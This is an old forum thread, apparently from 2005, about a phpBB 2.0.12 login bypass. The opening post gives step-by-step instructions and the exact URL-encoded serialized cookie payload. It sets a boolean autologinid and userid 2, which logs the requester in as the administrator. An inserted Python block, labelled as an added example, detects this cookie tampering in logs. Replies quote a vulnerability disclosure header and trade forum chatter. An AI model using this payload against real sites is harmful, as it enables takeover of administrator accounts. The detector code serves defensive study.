Author Topic: phpBB Bug (Again...)  (Read 4753 times)


Networks
phpBB Bug (Again...)
« on: March 25, 2005, 06:30:54 pm »
Quote
Ok, now let's get to it. Here is what you will need:
-Preferably a Mozilla client, such as Firefox
-LiveHTTP Headers plugin for Firefox Here

Ok, the way this exploit works is because in phpBB's session file, it utilizes a == instead of a === on autocheckid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am surprised it wasn't found earlier.

Howto:
Go to a forum, for example phpBB.com, open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot

In the packet will be the following data
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D


On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

and then click "reload".

After the page has reloaded you should be logged in as user number 2, which is usually the administrator's ID number.

I myself have tried it several times, I have not succeeded in getting an admin status so blah.

Edit: PHPBB 2.0.12 Exploit (That may be why)
« Last Edit: March 25, 2005, 06:32:49 pm by Networks »

http://www.zeroforce.net

Quote
[16:50:11] Networks:0:32: What will soup bot be like?
[16:50:15] Warrior[x86]:16:-1: soup-like.
[16:50:21] warzofbeta@Lordaeron:0:62: Like god.
[16:50:26] Warrior[x86]:16:-1: Fake?
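Added example, not part of the original posts and not phpBB code: a log-review check that URL-decodes a phpBB `*_data` cookie, parses the PHP-serialized array and flags any `autologinid` that is not a string, which is the type trick the quoted write-up relies on. The function names are hypothetical, and it assumes a legitimate `autologinid` is always a string and that values are ASCII.

```python
from urllib.parse import unquote

def _parse(s, i=0):
    """Parse one PHP-serialized value (subset: a, s, b, i). Returns (value, next_index)."""
    tag = s[i]
    if tag in "bi":                                # b:1;  or  i:42;
        end = s.index(";", i)
        n = int(s[i + 2:end])
        return (bool(n) if tag == "b" else n), end + 1
    if tag == "s":                                 # s:<len>:"<text>";  (ASCII assumed)
        colon = s.index(":", i + 2)
        length, start = int(s[i + 2:colon]), colon + 2
        return s[start:start + length], start + length + 2
    if tag == "a":                                 # a:<count>:{<key><value>...}
        colon = s.index(":", i + 2)
        count, i, out = int(s[i + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, i = _parse(s, i)
            out[key], i = _parse(s, i)
        return out, i + 1                          # step over the closing brace
    raise ValueError(f"unsupported type tag {tag!r}")

def check_cookie(raw):
    """Return a list of findings for one URL-encoded cookie value (empty list = clean)."""
    try:
        data, _ = _parse(unquote(raw))
    except (ValueError, IndexError, TypeError):
        return ["unparseable cookie"]
    if not isinstance(data, dict):
        return ["cookie is not an array"]
    auto = data.get("autologinid")
    if auto is not None and not isinstance(auto, str):
        # Assumption: the server only ever issues a string here, so any other
        # type means the client rewrote the cookie.
        return [f"autologinid has type {type(auto).__name__}, expected string"]
    return []

# Constructed sample set: the two cookie values shown in the post, plus a
# constructed one whose autologinid is an (empty) string.
SAMPLES = {
    "guest": "a%3A0%3A%7B%7D",
    "boolean autologinid": "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
    "string autologinid": "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, "->", check_cookie(raw) or "ok")
```

The same type test belongs in the server-side session code before any comparison is made; scanning logs only tells you whether the trick was attempted.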

iago
Re: phpBB Bug (Again...)
« Reply #1 on: March 25, 2005, 06:33:08 pm »
Eww @ not giving credit :P

------------------------------------------------------------------------
# phpBB 2.0.13 failure to reset user level after failed exploit
# discovered By : tOnk3r
# e-mail : m[at]spywire[dot]net
# date : 22-march-05
# shouts: pureone, spywire.net crew , and everybody i know!
# Versions affected : ALL versions upto and including 2.0.13
# status : vendor notified (phpbb)
------------------------------------------------------------------------

Hopefully they fix that fast :-o

Quik
Re: phpBB Bug (Again...)
« Reply #2 on: March 25, 2005, 06:39:55 pm »
It's quite ridiculous: I've seen so many phpBB exploits on the BugTraq mailing list, it's a wonder anyone uses that software.
Quote
[20:21:13] xar: i was just thinking about the time iago came over here and we made this huge bomb and light up the sky for 6 min
[20:21:15] xar: that was funny

Newby
Re: phpBB Bug (Again...)
« Reply #3 on: March 25, 2005, 06:43:37 pm »
SMF for life!
- Newby
http://www.x86labs.org

Quote
[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

I'd bet that you're currently bloated like a water balloon on a hot summer's day.

That analogy doesn't even make sense.  Why would a water balloon be especially bloated on a hot summer's day? For your sake, I hope there wasn't too much logic testing on your LSAT. 

Networks
Re: phpBB Bug (Again...)
« Reply #4 on: March 26, 2005, 01:46:41 am »
SMF for life!

Wrong, Invision for life!
